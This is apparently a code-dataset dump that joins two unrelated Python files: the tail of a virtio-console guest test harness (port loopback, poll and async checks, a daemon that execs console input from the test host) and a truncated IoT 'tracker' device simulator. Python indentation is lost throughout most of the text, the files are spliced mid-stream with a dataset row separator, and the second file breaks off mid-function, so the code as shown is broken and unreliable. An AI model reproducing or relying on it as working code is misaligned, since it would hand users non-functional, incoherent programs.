info_name = sysfspath + "/name"
port_name = self._readfile(info_name).strip()
if port_name != port["name"]:
print ("FAIL: Port info does not match "
"\n%s - %s\n%s - %s" %
(info_name, port_name,
"%s/virtio-ports/%s" % (DEBUGPATH, name),
port["name"]))
dev_ppath = DEVPATH + port_name
if not os.path.exists(dev_ppath):
print "FAIL: Symlink %s does not exist." % dev_ppath
                    if os.path.realpath(dev_ppath) != "/dev/%s" % name:
print "FAIL: Symlink %s is not correct." % dev_ppath
except AttributeError:
print ("Bad data on file %s:\n%s. " %
(open_db_file, "".join(file).strip()))
print "FAIL: Bad data on file %s." % open_db_file
return
ports[port['name']] = port
f.close()
return ports
def check_zero_sym(self):
"""
Check if port /dev/vport0p0 was created.
"""
symlink = "/dev/vport0p0"
if os.path.exists(symlink):
print "PASS: Symlink %s exists." % symlink
else:
print "FAIL: Symlink %s does not exist." % symlink
def init(self, in_files):
"""
Init and check port properties.
"""
self.ports = self._get_port_status(in_files)
if self.ports is None:
return
for item in in_files:
if (item[1] != self.ports[item[0]]["is_console"]):
print self.ports
print "FAIL: Host console is not like console on guest side\n"
return
print "PASS: Init and check virtioconsole files in system."
class Switch(Thread):
"""
Thread that sends data between ports.
"""
def __init__(self, in_files, out_files, event,
cachesize=1024, method=0):
"""
:param in_files: Array of input files.
:param out_files: Array of output files.
:param method: Method of read/write access.
:param cachesize: Block to receive and send.
"""
Thread.__init__(self, name="Switch")
self.in_files = in_files[0]
self.in_names = in_files[1]
self.out_files = out_files[0]
self.out_names = out_files[1]
self.exit_thread = event
self.method = method
self.cachesize = cachesize
def _none_mode(self):
"""
Read and write to device in blocking mode
"""
data = ""
while not self.exit_thread.isSet():
data = ""
for desc in self.in_files:
data += os.read(desc, self.cachesize)
if data != "":
for desc in self.out_files:
os.write(desc, data)
def _poll_mode(self):
"""
Read and write to device in polling mode.
"""
pi = select.poll()
po = select.poll()
for fd in self.in_files:
pi.register(fd, select.POLLIN)
for fd in self.out_files:
po.register(fd, select.POLLOUT)
while not self.exit_thread.isSet():
data = ""
t_out = self.out_files
readyf = pi.poll(1.0)
for i in readyf:
data += os.read(i[0], self.cachesize)
if data != "":
while ((len(t_out) != len(readyf)) and not
self.exit_thread.isSet()):
readyf = po.poll(1.0)
for desc in t_out:
os.write(desc, data)
def _select_mode(self):
"""
Read and write to device in selecting mode.
"""
while not self.exit_thread.isSet():
ret = select.select(self.in_files, [], [], 1.0)
data = ""
if ret[0] != []:
for desc in ret[0]:
data += os.read(desc, self.cachesize)
if data != "":
ret = select.select([], self.out_files, [], 1.0)
while ((len(self.out_files) != len(ret[1])) and not
self.exit_thread.isSet()):
ret = select.select([], self.out_files, [], 1.0)
for desc in ret[1]:
os.write(desc, data)
def _reconnect_none_mode(self):
"""
Read and write to device in blocking mode, close and reopen device
            when it gets an OSError.
This is workaround for hotplugging of virtio port.
"""
# TODO: Remove port unplugging after failure from guest_worker
# when bz796048 is resolved.
data = ""
while not self.exit_thread.isSet():
data = ""
for i in xrange(len(self.in_files)):
if self.exit_thread.isSet():
break
desc = self.in_files[i]
try:
data += os.read(desc, self.cachesize)
except OSError, inst:
if inst.errno == 9:
# Wait 0.1 before spoiling output with additional
# log information.
# time.sleep(0.5)
sys.stdout.write("FD closed, readerr %s\n" % inst)
while self.in_names[i] not in virt.files:
pass
self.in_files[i] = virt.files[self.in_names[i]]
else:
sys.stdout.write("Missing device, readerr %s\n"
% inst)
_desc = desc
for item in virt.files.iteritems():
if item[1] == desc:
path = item[0]
break
for item in virt.ports.iteritems():
if item[1]['path'] == path:
name = item[0]
break
virt.close(name)
while not self.exit_thread.isSet():
try:
desc = virt._open([name])[0]
sys.stdout.write("PASS: Opened %s\n"
% name)
break
except OSError:
pass
self.in_files[self.in_files.index(_desc)] = desc
if data != "":
for i in xrange(len(self.out_files)):
if self.exit_thread.isSet():
break
desc = self.out_files[i]
written = False
while not written:
try:
if self.exit_thread.isSet():
break
os.write(desc, data)
written = True
except OSError, inst:
if inst.errno == 9:
# Wait 0.1 before spoiling output with
# additional log information.
# time.sleep(0.5)
sys.stdout.write("FD closed, writeerr %s\n"
% inst)
while self.out_names[i] not in virt.files:
pass
self.out_files[i] = virt.files[
self.out_names[i]]
else:
sys.stdout.write("Missing device, writeerr"
" %s\n" % inst)
_desc = desc
for item in virt.files.iteritems():
if item[1] == desc:
path = item[0]
break
for item in virt.ports.iteritems():
if item[1]['path'] == path:
name = item[0]
break
virt.close(name)
while not self.exit_thread.isSet():
try:
desc = virt._open([name])[0]
sys.stdout.write("PASS: Opened "
"%s\n" % name)
break
except OSError:
pass
_desc = self.out_files.index(_desc)
self.out_files[_desc] = desc
def run(self):
if (self.method == VirtioGuest.LOOP_POLL):
self._poll_mode()
elif (self.method == VirtioGuest.LOOP_SELECT):
self._select_mode()
elif (self.method == VirtioGuest.LOOP_RECONNECT_NONE):
self._reconnect_none_mode()
elif (self.method == VirtioGuest.LOOP_NONE):
self._none_mode()
else:
print "WARNIGN: Unknown mode %s, using LOOP_NONE" % self.method
self._reconnect_none_mode()
class Sender(Thread):
"""
Creates a thread which sends random blocks of data to dst port.
"""
def __init__(self, port, event, length):
"""
:param port: Destination port
:param length: Length of the random data block
"""
Thread.__init__(self, name="Sender")
self.port = port
self.exit_thread = event
self.data = array.array('L')
for _ in range(max(length / self.data.itemsize, 1)):
self.data.append(random.randrange(sys.maxint))
def run(self):
while not self.exit_thread.isSet():
os.write(self.port, self.data)
def _open(self, in_files):
"""
Open devices and return array of descriptors
:param in_files: Files array
:return: Array of descriptor
"""
f = []
for item in in_files:
path = self.ports[item]["path"]
if (path in self.files):
f.append(self.files[path])
else:
try:
self.files[path] = os.open(path, os.O_RDWR)
if (self.ports[item]["is_console"] == "yes"):
print os.system("stty -F %s raw -echo" % (path))
print os.system("stty -F %s -a" % (path))
f.append(self.files[path])
except Exception, inst:
print "FAIL: Failed to open file %s" % (path)
raise inst
return f
@staticmethod
def pollmask_to_str(mask):
"""
        Convert poll mask to string
:param mask: poll return mask
"""
out = ""
if (mask & select.POLLIN):
out += "IN "
if (mask & select.POLLPRI):
out += "PRI IN "
if (mask & select.POLLOUT):
out += "OUT "
if (mask & select.POLLERR):
out += "ERR "
if (mask & select.POLLHUP):
out += "HUP "
if (mask & select.POLLMSG):
out += "MSG "
return out
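    # Illustrative mapping (not in the original source):
    #   pollmask_to_str(select.POLLIN | select.POLLOUT) -> "IN OUT "
    #   pollmask_to_str(select.POLLHUP)                 -> "HUP "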
def poll(self, port, expected, timeout=500):
"""
        Poll events from the device and print them as text.
        :param port: Port name.
        :param expected: Expected POLL status (mask)
"""
in_f = self._open([port])
p = select.poll()
p.register(in_f[0])
mask = p.poll(timeout)
maskstr = self.pollmask_to_str(mask[0][1])
if (mask[0][1] & expected) == expected:
print "PASS: Events: " + maskstr
else:
emaskstr = self.pollmask_to_str(expected)
print "FAIL: Events: " + maskstr + " Expected: " + emaskstr
def lseek(self, port, pos, how):
"""
Use lseek on the device. The device is unseekable so PASS is returned
when lseek command fails and vice versa.
:param port: Name of the port
:param pos: Offset
:param how: Relative offset os.SEEK_{SET,CUR,END}
"""
fd = self._open([port])[0]
try:
os.lseek(fd, pos, how)
except Exception, inst:
if inst.errno == 29:
print "PASS: the lseek failed as expected"
else:
print inst
print "FAIL: unknown error"
else:
print "FAIL: the lseek unexpectedly passed"
def blocking(self, port, mode=False):
"""
Set port function mode blocking/nonblocking
:param port: port to set mode
:param mode: False to set nonblock mode, True for block mode
"""
fd = self._open([port])[0]
try:
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
if not mode:
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
else:
fcntl.fcntl(fd, fcntl.F_SETFL, fl & ~os.O_NONBLOCK)
except Exception, inst:
print "FAIL: Setting (non)blocking mode: " + str(inst)
return
if mode:
print "PASS: set to blocking mode"
else:
print "PASS: set to nonblocking mode"
def __call__(self, sig, frame):
"""
Call function. Used for signal handle.
"""
if (sig == signal.SIGIO):
self.sigio_handler(sig, frame)
def sigio_handler(self, sig, frame):
"""
Handler for sigio operation.
:param sig: signal which call handler.
:param frame: frame of caller
"""
if self.poll_fds:
p = select.poll()
map(p.register, self.poll_fds.keys())
masks = p.poll(1)
print masks
for mask in masks:
self.poll_fds[mask[0]][1] |= mask[1]
def get_sigio_poll_return(self, port):
"""
        Return PASS/FAIL and the poll value in string format.
:param port: Port to check poll information.
"""
fd = self._open([port])[0]
maskstr = self.pollmask_to_str(self.poll_fds[fd][1])
if (self.poll_fds[fd][0] ^ self.poll_fds[fd][1]):
emaskstr = self.pollmask_to_str(self.poll_fds[fd][0])
print "FAIL: Events: " + maskstr + " Expected: " + emaskstr
else:
print "PASS: Events: " + maskstr
self.poll_fds[fd][1] = 0
def set_pool_want_return(self, port, poll_value):
"""
        Set the expected poll value for a port.
        :param port: Port for which the expected mask should be set.
:param poll_value: Value to check sigio signal.
"""
fd = self._open([port])[0]
self.poll_fds[fd] = [poll_value, 0]
print "PASS: Events: " + self.pollmask_to_str(poll_value)
def catching_signal(self):
"""
        :return: True if the signal should be caught, False if it should be
        ignored, and None when the configuration has not changed.
"""
ret = self.catch_signal
self.catch_signal = None
return ret
def async(self, port, mode=True, exp_val=0):
"""
Set port function mode async/sync.
        :param port: port which should be polled.
        :param mode: False to set sync mode, True for async mode.
        :param exp_val: Value which should be polled.
"""
fd = self._open([port])[0]
try:
fcntl.fcntl(fd, fcntl.F_SETOWN, os.getpid())
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
self.use_config.clear()
if mode:
self.catch_signal = True
os.kill(os.getpid(), signal.SIGUSR1)
self.use_config.wait()
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_ASYNC)
self.poll_fds[fd] = [exp_val, 0]
else:
del self.poll_fds[fd]
fcntl.fcntl(fd, fcntl.F_SETFL, fl & ~os.O_ASYNC)
self.catch_signal = False
os.kill(os.getpid(), signal.SIGUSR1)
self.use_config.wait()
except Exception, inst:
print "FAIL: Setting (a)sync mode: " + str(inst)
return
if mode:
print "PASS: Set to async mode"
else:
print "PASS: Set to sync mode"
def close(self, filepath):
"""
Close open port.
:param filepath: File to close.
"""
descriptor = None
path = self.ports[filepath]["path"]
if path is not None:
if path in self.files.keys():
descriptor = self.files[path]
del self.files[path]
if descriptor is not None:
try:
os.close(descriptor)
except Exception, inst:
print "FAIL: Closing the file: " + str(inst)
return
print "PASS: Close"
def open(self, in_file, attempts=1):
"""
        Open a device directly.
        :param in_file: Port name.
        :param attempts: Number of open attempts before giving up.
"""
opened = False
for i in xrange(attempts):
try:
name = self.ports[in_file]["path"]
self.files[name] = os.open(name, os.O_RDWR)
if (self.ports[in_file]["is_console"] == "yes"):
print os.system("stty -F %s raw -echo" % (name))
opened = True
break
except Exception, exc:
print str(exc)
time.sleep(0.1)
if opened:
print "PASS: All files opened correctly. (%d)" % i
else:
print "FAIL: Failed open file %s" % name
def loopback(self, in_files, out_files, cachesize=1024,
mode=0):
"""
Start a switch thread.
(There is a problem with multiple opens of a single file).
:param in_files: Array of input files.
:param out_files: Array of output files.
:param cachesize: Cachesize.
:param mode: Mode of switch.
"""
self.ports = self._get_port_status()
in_f = self._open(in_files)
out_f = self._open(out_files)
in_files = [self.ports[item]["path"] for item in in_files]
out_files = [self.ports[item]["path"] for item in out_files]
s = self.Switch([in_f, in_files], [out_f, out_files], self.exit_thread,
cachesize, mode)
s.start()
self.threads.append(s)
sys.stdout.write("PASS: Start switch\n")
def exit_threads(self):
"""
Function end all running data switch.
"""
self.exit_thread.set()
for th in self.threads:
print "join %s" % th.getName()
th.join()
self.exit_thread.clear()
del self.threads[:]
for desc in self.files.itervalues():
os.close(desc)
self.files.clear()
print "PASS: All threads finished"
def die(self):
"""
Quit consoleswitch.
"""
self.exit_threads()
sys.exit(0)
def send_loop_init(self, port, length):
"""
Prepares the sender thread. Requires clean thread structure.
"""
self.ports = self._get_port_status()
in_f = self._open([port])
self.threads.append(self.Sender(in_f[0], self.exit_thread, length))
print "PASS: Sender prepare"
def send_loop(self):
"""
Start sender data transfer. Requires senderprepare run first.
"""
self.threads[0].start()
print "PASS: Sender start"
def send(self, port, length=1, mode=True, is_static=False):
"""
        Send data of arbitrary length
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
:param is_static: False = generates $length long block (mode=0)
True = generates 4096 long block (faster, mode=1)
"""
in_f = self._open([port])
data = ""
writes = 0
if not is_static:
while len(data) < length:
data += "%c" % random.randrange(255)
try:
writes = os.write(in_f[0], data)
except Exception, inst:
print inst
else:
while len(data) < 4096:
data += "%c" % random.randrange(255)
if mode:
while (writes < length):
try:
writes += os.write(in_f[0], data)
except Exception, inst:
print inst
if writes >= length:
print "PASS: Send data length %d" % writes
else:
print ("FAIL: Partial send: desired %d, transferred %d" %
(length, writes))
def recv(self, port, length=1, bfr=1024, mode=True):
"""
        Receive data of arbitrary length.
        :param port: Port to read data from
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
"""
in_f = self._open([port])
recvs = ""
try:
recvs = os.read(in_f[0], bfr)
except Exception, inst:
print inst
if mode:
while (len(recvs) < length):
try:
recvs += os.read(in_f[0], bfr)
except Exception, inst:
print inst
if len(recvs) >= length:
print "PASS: Recv data length %d" % len(recvs)
else:
print ("FAIL: Partial recv: desired %d, transferred %d" %
(length, len(recvs)))
def clean_port(self, port, bfr=1024):
in_f = self._open([port])
ret = select.select([in_f[0]], [], [], 1.0)
buf = ""
if ret[0]:
buf = os.read(in_f[0], bfr)
print ("PASS: Rest in socket: ") + str(buf[:10])
class VirtioGuestNt(VirtioGuest):
"""
Test tools of virtio_ports.
"""
LOOP_NONE = 0
LOOP_POLL = 0 # TODO: Use SELECT instead of NONE (poll not supp. by win)
LOOP_SELECT = 0 # TODO: Support for Select
def _get_port_status(self, in_files=[]):
"""
Get info about ports.
:param in_files: Array of input files.
:return: Ports dictionary of port properties
"""
ports = {}
for in_file in in_files:
port = {}
port['path'] = "\\\\.\\%s" % in_file[0]
port['name'] = in_file[0]
port['is_console'] = in_file[1]
ports[in_file[0]] = port
return ports
def init(self, in_files):
"""
Init and check port properties.
"""
# This only sets the ports names and paths
# TODO: symlinks are sometimes missing, use /dev/vport%dp%d"
self.ports = self._get_port_status(in_files)
# Check if all ports really exists
remove = []
for item in self.ports.iteritems():
port = item[1]
try:
hFile = win32file.CreateFile(port['path'], 0, 0, None,
win32file.OPEN_EXISTING,
win32file.FILE_ATTRIBUTE_NORMAL,
None)
win32file.CloseHandle(hFile)
except win32file.error:
remove.append(port['name'])
print "Fail to open port %s" % port['name']
for name in remove:
del(self.ports[name])
# Check if in_files count and system port count matches
# TODO: Not all devices are listed
# TODO: Find the way to list all devices
if remove:
print "FAIL: Not all ports are present, check the log."
return
"""
reg = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, "System")
reg = _winreg.OpenKey(reg, "CurrentControlSet")
reg = _winreg.OpenKey(reg, "Services")
reg = _winreg.OpenKey(reg, "VirtioSerial")
reg = _winreg.OpenKey(reg, "Enum")
virtio_port_count = _winreg.QueryValueEx(reg, "Count")[0]
if virtio_port_count != len(self.ports):
print ("FAIL: Number of ports (%d) doesn't match the number"
" of ports in registry (%d)"
% (len(self.ports), virtio_port_count))
return
"""
print "PASS: Init and check virtioconsole files in system."
def close(self, filepath):
"""
Close open port.
:param filepath: File to close.
"""
hFile = None
path = self.ports[filepath]["path"]
if path is not None:
if path in self.files.keys():
hFile = self.files[path]
del self.files[path]
if hFile is not None:
try:
win32file.CloseHandle(hFile)
except win32file.error, inst:
print "FAIL: Closing the file: " + str(inst)
return
print "PASS: Close"
def _open(self, in_files):
"""
Open devices and return array of descriptors
:param in_files: List of port names
:return: Array of descriptor
"""
f = []
for name in in_files:
path = self.ports[name]["path"]
if path in self.files:
f.append(self.files[path])
else:
ret = self.open(name)
if ret:
raise ret
f.append(self.files[path])
return f
def open(self, name):
"""
Direct open devices.
:param name: Port name.
:return: 0 on success
"""
path = self.ports[name]['path']
try:
self.files[path] = win32file.CreateFile(path,
win32file.GENERIC_WRITE |
win32file.GENERIC_READ,
0,
None,
win32file.OPEN_EXISTING,
win32file.FILE_ATTRIBUTE_NORMAL,
None)
except win32file.error, exc_detail:
print "%s\nFAIL: Failed open file %s" % (str(exc_detail), name)
return exc_detail
print "PASS: All files opened correctly."
def exit_threads(self):
"""
Function end all running data switch.
"""
self.exit_thread.set()
for th in self.threads:
print "join"
th.join()
self.exit_thread.clear()
del self.threads[:]
for desc in self.files.itervalues():
win32file.CloseHandle(desc)
self.files.clear()
print "PASS: All threads finished"
class Switch(Thread):
"""
Thread that sends data between ports.
"""
def __init__(self, in_files, out_files, event,
cachesize=1024, method=0):
"""
:param in_files: Array of input files.
:param out_files: Array of output files.
:param method: Method of read/write access.
:param cachesize: Block to receive and send.
"""
Thread.__init__(self, name="Switch")
self.in_files = in_files
self.out_files = out_files
self.exit_thread = event
self.method = method
self.cachesize = cachesize
def _none_mode(self):
"""
Read and write to device in blocking mode
"""
data = ""
while not self.exit_thread.isSet():
data = ""
for desc in self.in_files:
ret, _data = win32file.ReadFile(desc, self.cachesize)
if ret:
msg = ("Error occurred while receiving data, "
"err=%s, read=%s" % (ret, _data))
print "FAIL: " + msg
raise IOError(msg)
data += _data
if data != "":
for desc in self.out_files:
ret, _data = win32file.WriteFile(desc, data)
if ret:
msg = ("Error occurred while sending data, "
"err=%s, sentlen=%s" % (ret, _data))
print "FAIL: " + msg
raise IOError(msg)
def run(self):
self._none_mode()
class Sender(Thread):
"""
Creates a thread which sends random blocks of data to dst port.
"""
def __init__(self, port, event, length):
"""
:param port: Destination port
:param length: Length of the random data block
"""
Thread.__init__(self, name="Sender")
self.port = port
self.exit_thread = event
self.data = array.array('L')
for _ in range(max(length / self.data.itemsize, 1)):
self.data.append(random.randrange(sys.maxint))
def run(self):
while not self.exit_thread.isSet():
if win32file.WriteFile(self.port, self.data)[0]:
msg = "Error occurred while sending data."
print "FAIL: " + msg
raise IOError(msg)
def send_loop_init(self, port, length):
"""
Prepares the sender thread. Requires clean thread structure.
"""
in_f = self._open([port])
self.threads.append(self.Sender(in_f[0], self.exit_thread, length))
print "PASS: Sender prepare"
def send_loop(self):
"""
Start sender data transfer. Requires senderprepare run first.
"""
self.threads[0].start()
print "PASS: Sender start"
def send(self, port, length=1, mode=True, is_static=False):
"""
        Send data of arbitrary length
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
:param is_static: False = generates $length long block (mode=0)
True = generates 4096 long block (faster, mode=1)
"""
port = self._open([port])[0]
data = ""
writes = 0
if not is_static:
try:
while len(data) < length:
data += "%c" % random.randrange(255)
_ret, _len = win32file.WriteFile(port, data)
if _ret:
msg = ("Error occurred while sending data, "
"err=%s, sentlen=%s" % (_ret, _len))
raise IOError(msg)
writes = _len
except Exception, inst:
print inst
else:
while len(data) < 4096:
data += "%c" % random.randrange(255)
if mode:
try:
while (writes < length):
_ret, _len = win32file.WriteFile(port, data)
if _ret:
msg = ("Error occurred while sending data, err=%s"
", sentlen=%s, allsentlen=%s" % (_ret, _len,
writes))
raise IOError(msg)
writes += _len
except Exception, inst:
print inst
if writes >= length:
print "PASS: Send data length %d" % writes
else:
print ("FAIL: Partial send: desired %d, transferred %d" %
(length, writes))
def recv(self, port, length=1, buflen=1024, mode=True):
"""
        Receive data of arbitrary length.
        :param port: Port to read data from
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
"""
port = self._open([port])[0]
recvs = ""
try:
_ret, _data = win32file.ReadFile(port, buflen)
if _ret:
msg = ("Error occurred while receiving data, "
"err=%s, read=%s" % (_ret, _data))
raise IOError(msg)
recvs = _data
except Exception, inst:
print inst
if mode:
while (len(recvs) < length):
try:
_ret, _data = win32file.ReadFile(port, buflen)
if _ret:
msg = ("Error occurred while receiving data, "
"err=%s, read=%s, allread=%s" % (_ret, _data,
len(recvs)))
raise IOError(msg)
except Exception, inst:
print inst
if len(recvs) >= length:
print "PASS: Recv data length %d" % len(recvs)
else:
print ("FAIL: Partial recv: desired %d, transferred %d" %
(length, len(recvs)))
def is_alive():
"""
    Check if only the main thread is alive and if the guest reacts.
"""
if ((os_linux and (threading.activeCount() == 2)) or
((not os_linux) and (threading.activeCount() == 1))):
print ("PASS: Guest is ok no thread alive")
else:
threads = ""
for thread in threading.enumerate():
threads += thread.name + ", "
print ("FAIL: On guest run thread. Active thread:" + threads)
def guest_exit():
"""
quit/finish/exit this script
"""
global exiting
exiting = True
def compile_script():
"""
Compile virtio_console_guest.py to speed up.
"""
import py_compile
py_compile.compile(__file__, "%so" % __file__)
print "PASS: compile"
sys.exit(0)
def worker(virt):
"""
Worker thread (infinite) loop of virtio_guest.
"""
global exiting
print "PASS: Daemon start."
p = select.poll()
p.register(sys.stdin.fileno())
while not exiting:
d = p.poll()
if (d[0][1] == select.POLLIN):
out = raw_input()
try:
exec out
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "On Guest exception from: \n" + "".join(
traceback.format_exception(exc_type,
exc_value,
exc_traceback))
print "FAIL: Guest command exception."
elif (d[0][1] & select.POLLHUP):
time.sleep(0.5)
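# The host side drives this worker by writing Python statements, one per
# line, to the guest console; each line is exec'd above.  Illustrative
# command sequence (port names and sizes are hypothetical, but every function
# called here exists in this module):
#   virt.init([('org.fedoraproject.console.0', 'yes'), ('port1', 'no')])
#   virt.open('port1')
#   virt.send('port1', length=1024, mode=False)
#   virt.close('port1')
#   guest_exit()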
def sigusr_handler(sig, frame):
pass
class Daemon:
"""
Daemonize guest
"""
def __init__(self, stdin, stdout, stderr):
"""
Init daemon.
:param stdin: path to stdin file.
:param stdout: path to stdout file.
:param stderr: path to stderr file.
"""
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
@staticmethod
def is_file_open(path):
"""
        Determine which processes have the file open.
:param path: Path to file.
:return: [[pid,mode], ... ].
"""
opens = []
pids = os.listdir('/proc')
for pid in sorted(pids):
try:
int(pid)
except ValueError:
continue
fd_dir = os.path.join('/proc', pid, 'fd')
try:
for filepath in os.listdir(fd_dir):
try:
p = os.path.join(fd_dir, filepath)
link = os.readlink(os.path.join(fd_dir, filepath))
if link == path:
mode = os.lstat(p).st_mode
opens.append([pid, mode])
except OSError:
continue
except OSError, e:
if e.errno == 2:
continue
raise
return opens
def daemonize(self):
"""
Run guest as a daemon.
"""
try:
pid = os.fork()
if pid > 0:
return False
except OSError, e:
sys.stderr.write("Daemonize failed: %s\n" % (e))
sys.exit(1)
os.chdir("/")
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError, e:
sys.stderr.write("Daemonize failed: %s\n" % (e))
sys.exit(1)
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'w')
se = file(self.stderr, 'w')
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
sys.stderr = os.fdopen(sys.stderr.fileno(), 'w', 0)
return True
def start(self):
"""
Start the daemon
:return: PID of daemon.
"""
# Check for a pidfile to see if the daemon already runs
openers = self.is_file_open(self.stdout)
rundaemon = False
if len(openers) > 0:
for i in openers:
if i[1] & stat.S_IWUSR:
rundaemon = True
openers.remove(i)
if len(openers) > 0:
for i in openers:
os.kill(int(i[0]), 9)
time.sleep(0.3)
# Start the daemon
if not rundaemon:
if self.daemonize():
self.run()
def run(self):
"""
Run guest main thread
"""
global virt
global exiting
virt = VirtioGuestPosix()
slave = Thread(target=worker, args=(virt,))
slave.start()
signal.signal(signal.SIGUSR1, sigusr_handler)
signal.signal(signal.SIGALRM, sigusr_handler)
while not exiting:
signal.alarm(1)
signal.pause()
catch = virt.catching_signal()
if catch:
signal.signal(signal.SIGIO, virt)
elif catch is False:
signal.signal(signal.SIGIO, signal.SIG_DFL)
if catch is not None:
virt.use_config.set()
print "PASS: guest_exit"
sys.exit(0)
def main():
"""
Main function for OS Linux with infinite loop to catch signal from system.
"""
stdin = "/tmp/guest_daemon_pi"
stdout = "/tmp/guest_daemon_po"
stderr = "/tmp/guest_daemon_pe"
for f in [stdin, stdout, stderr]:
try:
os.mkfifo(f)
except OSError, e:
if e.errno == 17:
pass
daemon = Daemon(stdin,
stdout,
stderr)
daemon.start()
d_stdin = os.open(stdin, os.O_WRONLY)
d_stdout = os.open(stdout, os.O_RDONLY)
d_stderr = os.open(stderr, os.O_RDONLY)
s_stdin = sys.stdin.fileno()
s_stdout = sys.stdout.fileno()
s_stderr = sys.stderr.fileno()
pid = filter(lambda x: x[0] != str(os.getpid()),
daemon.is_file_open(stdout))[0][0]
print "PASS: Start"
while 1:
ret = select.select([d_stderr,
d_stdout,
s_stdin],
[], [], 1.0)
if s_stdin in ret[0]:
os.write(d_stdin, os.read(s_stdin, 1))
if d_stdout in ret[0]:
os.write(s_stdout, os.read(d_stdout, 1024))
if d_stderr in ret[0]:
os.write(s_stderr, os.read(d_stderr, 1024))
if not os.path.exists("/proc/" + pid):
sys.exit(0)
os.close(d_stdin)
os.close(d_stdout)
os.close(d_stderr)
def main_nt():
"""
Main function for Windows NT with infinite loop.
"""
global virt
global exiting
virt = VirtioGuestNt()
print "PASS: Start"
sys.stdout.flush()
while not exiting:
try:
exec raw_input()
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "On Guest exception from: \n" + "".join(
traceback.format_exception(exc_type,
exc_value,
exc_traceback))
print "FAIL: Guest command exception."
sys.stdout.flush()
print "PASS: guest_exit"
sys.exit(0)
if __name__ == "__main__":
if (len(sys.argv) > 1) and (sys.argv[1] == "-c"):
compile_script()
if os_linux: # Linux
main()
else: # Windows
main_nt()
| gpl-2.0 |
DevicePilot/synth | synth/devices/tracker.py | 1 | 5816 | """
tracker
=====
Tracks a target value in a controlled way. Can be used to simulate patterns of e.g. heating or cooking etc.
Configurable parameters::
{
output_property : "temp" (or whatever)
min_value : Minimum value of output
max_value : Maximum value of output
max_value_twosigma : Error in max value (static random number per device). Will never be bigger than +/- this amount
noise : Ongoing noise added to value (varies slowly)
precision : Precision of output (e.g. 1 for integers, 10 for decades)
opening_times : ["Mo-Fr 09:00-12:00", "Mo-Su"] The opening times which drive activity
smoothing_alpha : 0..1 (smaller means tracks slower, 1 means tracks with no smoothing)
period : Period of output, as ISO8601 period (e.g. "PT15M" for every 15 minutes")
        randomness_property : Name of the property to use to get randomness (so if for example you want all devices at one location to share randomness, refer to the 'location' property here)
}
Device properties created::
{
<output_property>
}
"""
import random
import logging
import time
import isodate
from math import sin, pi
from .device import Device
from common import opening_times
DEFAULT_PERIOD = "PT15M"
DEFAULT_VARIABILITY_BY_DEVICE = 0.2
MINS = 60
HOURS = MINS * 60
DAYS = HOURS * 24
def hash_to_0_1(v, n):
# v is a value to derive a random number from (can be anything at all - a number, a string etc.)
# n is an integer which says which random number we want, e.g. 0 is the first random number, 1 is the second
r = random.Random()
r.seed(v)
r.random()
r.random()
for i in range(n):
r.random()
result = r.random()
return result
def frequency_noise(t):
h = 2 * pi * t/HOURS # Convert seconds into hours, and radians
v = sin(h) + sin(h/1.3) + sin(h/2.7) + sin(h/7.7) + sin(h/13.3) + sin(h/29.3) + sin(h/47)
v = (v + 1.0) / 2.0
return v # Return 0..1
class Tracker(Device):
def __init__(self, instance_name, time, engine, update_callback, context, params):
super(Tracker,self).__init__(instance_name, time, engine, update_callback, context, params)
args = params["tracker"]
self.randomness_property = args.get("randomness_property", None)
self.my_random = random.Random() # We use our own random-number generator, one per variable per device
if self.randomness_property is None:
self.my_random.seed(self.get_property("$id")) # Seed each device uniquely
else:
self.my_random.seed(hash(self.get_property(self.randomness_property)))
open_t = args.get("opening_times")
if isinstance(open_t, list):
open_t = open_t[self.my_random.randrange(len(open_t))] # Choose one of the options
self.set_property("opening_times", open_t)
self.opening_times = opening_times.parse(open_t)
self.output_property = args.get("output_property", "tracker")
self.min_value = args.get("min_value", 0)
mx = args.get("max_value", 100)
mxs = args.get("max_value_twosigma", 0)
self.max_value = random.gauss(mx, mxs/2)
self.max_value = min(self.max_value, mx+mxs)
self.max_value = max(self.max_value, mx-mxs)
self.noise_level = args.get("noise", 0)
self.precision = args.get("precision", 1)
self.smoothing_alpha = args.get("smoothing_alpha", 0.1)
self.polling_interval = isodate.parse_duration(args.get("period", DEFAULT_PERIOD)).total_seconds()
self.tracking_value = None
self.time_offset = None
self.set_property(self.output_property, self.current_value())
self.engine.register_event_in(self.polling_interval, self.tick_update, self, self)
def comms_ok(self):
return super(Tracker,self).comms_ok()
def external_event(self, event_name, arg):
super(Tracker,self).external_event(event_name, arg)
pass
def close(self):
super(Tracker,self).close()
# Private methods
def tick_update(self, _):
self.set_properties({
self.output_property : self.current_value(),
"open" : opening_times.is_open(self.engine.get_now(), self.opening_times)
})
self.engine.register_event_in(self.polling_interval, self.tick_update, self, self)
def fixed_random(self, v, n): # TODO: This "delay generation of randomness until our randomness_property has been set" behaviour is no longer required, now that we can specify init order in scenario files using "name:N" format
if v is not None:
return v
if self.property_exists(self.randomness_property):
return hash_to_0_1(self.get_property(self.randomness_property), n)
return None # We can't operate
def current_value(self):
self.time_offset = self.fixed_random(self.time_offset, 0)
now = self.engine.get_now() + (self.time_offset - 0.5) * 60 * 60 * 2 # Add +/- 1h of shift to opening times
open = opening_times.is_open(now, self.opening_times)
if open:
a = 1.0
else:
a = 0.0
target = self.min_value + a * (self.max_value - self.min_value)
if self.tracking_value is None:
self.tracking_value = target
else:
self.tracking_value = self.tracking_value * (1-self.smoothing_alpha) + target * self.smoothing_alpha
